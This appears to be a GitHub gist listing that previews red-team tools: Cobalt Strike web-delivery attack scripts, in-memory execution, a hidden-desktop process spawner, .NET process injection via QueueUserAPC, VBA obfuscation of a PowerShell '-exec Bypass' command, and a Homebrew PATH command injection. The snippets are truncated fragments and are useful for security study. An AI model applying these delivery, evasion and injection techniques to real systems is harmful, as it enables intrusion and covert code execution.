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dtmsecurity / sharpgen.cna
Created November 8, 2018 16:34
SharpGen Aggressor Beacon Wrapper
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");
alias sharpgen{
$executionId = "sharpgen_" . int(rand() * 100000);
$temporaryCsharp = $temppath . $executionId . ".cs";
$executableFilename = $temppath . $executionId . ".exe";
rsmudge / stagelesspython.cna
Created April 26, 2017 18:15
Stageless Python Web Delivery attack. Kind of fun. I did cheat and use an internal API. :)
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
local('%options $x86payload $x64payload $url $script');
%options = $3;
# generate our stageless x86 payload
artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
capnspacehook / invokeInMemLinux.go
Created February 21, 2019 13:37
Executes a binary or file in memory on a Linux system. Uses the memfd_create(2) syscall. Credits and idea from:
package main
import (
khr0x40sh / Get-VBACHRObfuscatedString.ps1
Created November 19, 2019 15:36
Takes a string and applies CHR(ascii int) & for each character in string
Param([string]$string = "C:\windows\syswow64\windowspowershell\v1.0\powershell.exe -exec Bypass -nop ping"
$result = ""
$strA = $string.ToCharArray()
for($i = 0; $i -lt $strA.Length; $i++)
$x = [byte]$strA[$i]
$result += "Chr (" + $x.ToString() + ") & "
rsmudge / stagelessweb.cna
Last active April 15, 2021 11:49
A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)
# Scripted Web Delivery (Stageless)
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
local('%options $script $url $arch');
%options = $3;
# get the arch right.
This file has been truncated, but you can view the full file.
[*] - C:\Windows\System32\1028\VsGraphicsResources.dll
[?] 64-bit Image!
[>] Time Stamp: 12/31/1969 19:00:00
[>] Function Count:
[>] Named Functions:
[>] Ordinal Base:
[>] Function Array RVA: 0x
[>] Name Array RVA: 0x
Mr-Un1k0d3r / run.c
Created August 11, 2021 18:07
spawn an invisible process
// To compile: gcc64.exe run.c -o run.exe
// To run: run.exe cmd.exe "/c whoami"
#include <Windows.h>
#include <stdio.h>
int main(int argc, char **argv) {
CHAR cDesktop[] = "hiddendesktop";
ropnop / go-sharp-loader.go
Created August 5, 2020 17:12
Example Go file embedding multiple .NET executables
package main
Example Go program with multiple .NET Binaries embedded
This requires packr ( and the utility. Install with:
$ go get -u
Place all your EXEs are in a "binaries" folder
rvrsh3ll / DInjectQueuerAPC.cs
Created November 20, 2020 15:10 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
public class Program
n0ncetonic /
Created April 3, 2019 02:03
Command Injection via Homebrew $PATH trickery
# Command Injection via Homebrew $PATH trickery
# n0ncetonic
# Blacksun Research Labs 2019
banner=$(/bin/cat <<EOF